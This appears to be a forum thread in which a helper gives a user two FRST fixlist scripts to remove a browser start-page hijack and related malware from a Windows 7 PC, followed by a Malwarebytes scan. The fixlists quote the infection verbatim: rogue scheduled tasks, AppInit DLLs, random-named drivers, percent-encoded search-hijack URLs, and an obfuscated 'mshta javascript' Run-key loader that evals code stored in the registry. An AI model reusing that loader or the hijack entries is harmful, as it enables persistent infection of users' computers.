Search.sidecubes.com, Windows 7 64 bit, start page

Hello

Open the system Notepad and paste:

Task: {17AACD91-F04B-42CB-843D-862982F1EE7A} - \Security Center Update - 3338532199 - No File ==== ATTENTION
Task: {18C585DA-6F1B-4F63-82BC-D2E06F087210} - System32\Tasks\ProtectPro = c:\programdata\{d84c79ba-da62-1a5e-d84c-c79bada6e6eb}\2551631669818428310b.exe ==== ATTENTION
Task: {2CAE76C5-B48C-48D3-9725-7A18DC1A77F1} - System32\Tasks\{42C94FEA-AB53-4E2E-9F85-C62106B4773A} = pcalua.exe -a C:\Users\Justyna\AppData\Roaming\sweet-page\UninstallManager.exe -c -ptid=sof
Task: {2F5E84A3-5274-4BCF-BB88-6F28E280E580} - System32\Tasks\{C1DC9FDD-AAF7-45CC-93BD-54B28DF0FFA9} = pcalua.exe -a C:\Users\Justyna\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=cor ==== ATTENTION
Task: {2FAF4089-0F6E-4733-AE89-7D38CEA8F419} - \Security Center Update - 3243284914 - No File ==== ATTENTION
Task: {30264A46-AA3B-4419-AA2F-E865CDA66807} - System32\Tasks\Bidaily Synchronize Task[973b] = c:\programdata\{640d034a-50cc-6849-640d-d034a50c0d29}\murphy's.law.of.love.e01.webrip.exe ==== ATTENTION
Task: {38B5521B-A241-4800-B29D-B7D54BD21F2D} - \Security Center Update - 3334281307 - No File ==== ATTENTION
Task: {4494FB3B-B839-4678-9CEE-75C0A5C17F2A} - System32\Tasks\{463CF58D-6652-4F15-91B9-CF0C8213521D} = Chrome.exe http://ui.skype.com/ui/0/6.0.0.120/pl/abandoninstall?page=tsBing
Task: {79ADBF41-4082-4434-8DED-E55453AECB31} - System32\Tasks\Security Center Update - 4187020142 = C:\Users\Justyna\AppData\Roaming\Akyvde\muqanoi.exe ==== ATTENTION
Task: {8418D9D4-618B-4CAE-9768-5DE8AD8DE12F} - System32\Tasks\QuickCompile = c:\programdata\{4575e389-26e6-dff2-4575-5e38926e8e24}\1357123297756836661b.exe ==== ATTENTION
Task: {94A2CE69-CFBE-4D72-8215-6F0C16CB83A3} - \Security Center Update - 580129234 - No File ==== ATTENTION
Task: {9DDCCF31-7C60-4775-8BD6-029C70D87AA7} - System32\Tasks\CIS_{15198508-521A-4D69-8E5B-B94A6CCFF805} = C:\ProgramData\cisB47A.exe ==== ATTENTION
Task: {9F4BCF7B-4928-43CA-8E06-5A448C2F727B} - \Security Center Update - 2587336593 - No File ==== ATTENTION
Task: {C83AAAE3-6D80-4E86-8EB7-FAAF8C51C421} - System32\Tasks\Security Center Update - 426708800 = C:\Users\Justyna\AppData\Roaming\Xewoxu\pavuot.exe ==== ATTENTION
Task: {D1D42BF5-F3F3-4979-908E-8FAEEEC4974B} - System32\Tasks\FOBNFKRHFL1 = C:\ProgramData\SecurityUtility\SecurityUtility.exe ==== ATTENTION
Task: {E828CBD6-3068-47D1-B916-C746EBE486C2} - System32\Tasks\snp = C:\ProgramData\Nimzap\k0tdpk04.exe [2015-08-11] ()
Task: {F6E56698-148B-4E16-A707-CB418BCD8692} - System32\Tasks\PowerBooster = c:\programdata\{60074800-9fbc-173c-6007-748009fb2002}\2649204041121149254b.exe ==== ATTENTION
Task: {FABE74E7-05D4-4BA3-8AA1-C8C6FAB61119} - System32\Tasks\snf = C:\ProgramData\Nimzap\k0tdpk04.exe [2015-08-11] ()
Task: C:\windows\Tasks\Bidaily Synchronize Task[973b].job = c:\programdata\{640d034a-50cc-6849-640d-d034a50c0d29}\murphy's.law.of.love.e01.webrip.exe ==== ATTENTION
Task: C:\windows\Tasks\FOBNFKRHFL1.job = C:\ProgramData\SecurityUtility\SecurityUtility.exe ==== ATTENTION
Task: C:\windows\Tasks\PowerBooster.job = c:\programdata\{60074800-9fbc-173c-6007-748009fb2002}\2649204041121149254b.exe ==== ATTENTION
Task: C:\windows\Tasks\ProtectPro.job = c:\programdata\{d84c79ba-da62-1a5e-d84c-c79bada6e6eb}\2551631669818428310b.exe ==== ATTENTION
Task: C:\windows\Tasks\QuickCompile.job = c:\programdata\{4575e389-26e6-dff2-4575-5e38926e8e24}\1357123297756836661b.exe ==== ATTENTION
Task: C:\windows\Tasks\Security Center Update - 4187020142.job = C:\Users\Justyna\AppData\Roaming\Akyvde\muqanoi.exe ==== ATTENTION
Task: C:\windows\Tasks\Security Center Update - 426708800.job = C:\Users\Justyna\AppData\Roaming\Xewoxu\pavuot.exe ==== ATTENTION
HKLM\...\Run: [] = [X]
HKLM-x32\...\Run: [GrooveMonitor] = C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [HP Software Update] = C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] = [X]
HKLM-x32\...\Run: [gmsd_pl_005010050] = [X]
HKLM-x32\...\Run: [gmsd_pl_005010051] = [X]
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\...\Run: [Akamai NetSession Interface] = C:\Users\Justyna\AppData\Local\Akamai\netsession_win.exe [4673432 2014-10-30] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\...\Run: [**67dec09e*] = mshta javascript:QfnxmLn6="Me";Cp7=new%20ActiveXObject("WScript.Shell");lhOlm9r="ldAl";A2ZDD=Cp7.RegRead("HKCU\\software\\615a03f7\\92317217");rQpYyo49="8";eval(A2ZDD);JnVlb0lJp="wq7I1joaD"; ===== ATTENTION (Value Name with invalid characters)
AppInit_DLLs: C:\ProgramData\Nimzap\bxhyak3y.dll = C:\ProgramData\Nimzap\bxhyak3y.dll [146944 2015-08-11] ()
AppInit_DLLs-x32: C:\ProgramData\Nimzap\mqwjv0k4.dll = C:\ProgramData\Nimzap\mqwjv0k4.dll [120320 2015-08-11] ()
ShellIconOverlayIdentifiers: [1SecureIconsProvider] - {FC9D8189-520A-4417-AED7-9EAC810C6FBA} = C:\ProgramData\Microsoft\Secure\Icons\SecureIconsProvider.dll No File
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] - {36A21736-36C2-4C11-8ACB-D4136F2B57BD} = No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdAz5t-sm61LnN_kTIKlZz_-SMiSJHrGKGSuNznpyS_C3m2KCHktipOX0DiKZVzijmrW7VzIzD-4FTHhfp7ltKAYD-YlAqqNqk5qjL45IdN1H04xb-M78tePfevYpsS_Y5ThUFh81rleHeKdq={searchTerms}
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdAz5t-sm61LnN_kTIKlZz_-SMiSJHrGKGSuNznpyS_C3m2KCHktipOX0DiKZVzijmrW7VzIzD-4FTHhfp7ltKAYD-YlAqqNqk5qjL45IdN1H04xb-M78tePfevYpsS_Y5ThUFh81rleHeKdq={searchTerms}
SearchScopes: HKLM-x32 - ielnksrch URL = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdAz5t-sm61LnN_kTIKlZz_-SMiSJHrGKGSuNznpyS_C3m2KCHktipOX0DiKZVzijmrW7VzIzD-4FTHhfp7ltKAYD-YlAqqNqk5qjL45IdN1H04xb-M78tePfevYpsS_Y5ThUFh81rleHeKdq={searchTerms}
SearchScopes: HKU\.DEFAULT - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2676438211-3974882995-393104745-1001 - {ielnksrch} URL = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdAz5t-sm61LnN_kTIKlZz_-SMiSJHrGKGSuNznpyS_C3m2KCHktipOX0DiKZVzijmrW7VzIzD-4FTHhfp7ltKAYD-YlAqqNqk5qjL45IdN1H04xb-M78tePfevYpsS_Y5ThUFh81rleHeKdq={searchTerms}
S2 jolugepba; C:\ProgramData\EroBisis\onuwci.exe [124880 2015-07-29] () [File not signed]
S2 kalghuir; C:\ProgramData\EroBisis\onuaci.exe [124880 2015-07-29] () [File not signed]
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [X]
R2 Nimzap; C:\ProgramData\Nimzap\Nimzap [X]
S4 RsRavMon; "C:\Program Files (x86)\Rising\RAV\ravmond.exe" [X]
U3 axlicxit; C:\Windows\System32\Drivers\axlicxit.sys [0] (Microsoft Corporation) ==== ATTENTION (zero byte File/Folder)
S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X]
S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X]
S1 fiwaqumi; \\C:\windows\system32\drivers\fiwaqumi.sys [X]
S1 genqvrzl; \\C:\windows\system32\drivers\genqvrzl.sys [X]
S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X]
S3 hwusb_cdcacm; system32\DRIVERS\ew_cdcacm.sys [X]
S3 hwusb_wwanecm; system32\DRIVERS\ew_wwanecm.sys [X]
S1 jzsycyqi; \\C:\windows\system32\drivers\jzsycyqi.sys [X]
S1 njrlpfem; \\C:\windows\system32\drivers\njrlpfem.sys [X]
S1 ppfd_vt_1_10_0_21; system32\drivers\ppfd_vt_1_10_0_21.sys [X]
S1 qsafd_vt_1_10_0_20; system32\drivers\qsafd_vt_1_10_0_20.sys [X]
S1 qtsbmfjh; \\C:\windows\system32\drivers\qtsbmfjh.sys [X]
S1 rfbgofmk; \\C:\windows\system32\drivers\rfbgofmk.sys [X]
S1 rsnwggmp; \\C:\windows\system32\drivers\rsnwggmp.sys [X]
S1 tcfd_vt_1_10_0_21; system32\drivers\tcfd_vt_1_10_0_21.sys [X]
S1 tznlhqcn; \\C:\windows\system32\drivers\tznlhqcn.sys [X]
S3 vdrive; system32\DRIVERS\vdrive.sys [X]
S1 whodomkk; \\C:\windows\system32\drivers\whodomkk.sys [X]
2015-08-11 13:05 - 2015-08-11 13:05 - 00003512 _____ C:\windows\System32\Tasks\snp
2015-08-11 13:05 - 2015-08-11 13:05 - 00003150 _____ C:\windows\System32\Tasks\snf
2015-08-11 13:04 - 2015-08-11 13:05 - 00000000 ____ D C:\ProgramData\Nimzaps
2015-08-11 13:03 - 2015-08-11 20:28 - 00000000 ____ D C:\ProgramData\Nimzap
2015-08-11 13:03 - 2015-08-11 13:03 - 03386091 _____ (Dongphase) C:\Program Files\Common Files\dk5pajgv.exe
2015-08-11 13:02 - 2015-08-11 13:02 - 00000000 ____ D C:\Program Files\Common Files\gqw35yhh
2015-08-01 22:29 - 2015-08-01 22:29 - 00003102 _____ C:\windows\System32\Tasks\{AA51465D-EF03-4886-A00A-CB6BF7E40805}
2015-08-11 20:25 - 2014-11-11 11:23 - 00000000 ____ D C:\AdwCleaner
2015-08-11 13:03 - 2015-08-11 13:03 - 3386091 _____ (Dongphase) C:\Program Files\Common Files\dk5pajgv.exe
2015-08-01 19:33 - 2015-08-01 19:32 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsj4DC7.tmp
2015-08-05 09:48 - 2015-08-05 09:48 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsl4320.tmp
2015-07-31 21:34 - 2015-07-31 21:34 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsm56DB.tmp
2015-08-01 23:06 - 2015-08-01 23:06 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nst5D5E.tmp
2015-08-01 09:54 - 2015-08-01 09:54 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsu94AC.tmp
2015-08-04 09:47 - 2015-08-04 09:47 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsy468.tmp
2015-08-01 23:51 - 2015-08-01 23:51 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nszC26C.tmp
EmptyTemp:

Save the file under the name fixlist.txt and place it next to FRST in the same folder.

Scan with Malwarebytes Anti-Malware https://www.malwarebytes.org/downloads/

Post a new FRST log, without Addition.

Hello,

Open the system Notepad and paste:

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
FF Plugin: @iqiyi.com/npWebPlayer - C:\IQIYI Video\LStyle\npWebPlayer.dll [No File]
CHR HKLM-x32\...\Chrome\Extension: [fabcmochhfpldjekobfaaggijgohadih] - https://clients2.google.com/service/update2/crx
U3 a2o2duqd; C:\Windows\System32\Drivers\a2o2duqd.sys [0] (Microsoft Corporation) ==== ATTENTION (zero byte File/Folder)
2015-04-19 14:20 - 2015-08-12 11:32 - 0000626 ____ N () C:\Users\Justyna\AppData\Roaming\2jgPjH6SdsfuOaXaijwSqafN
DeleteQuarantine:

Save the file under the name fixlist.txt and place it next to FRST in the same folder.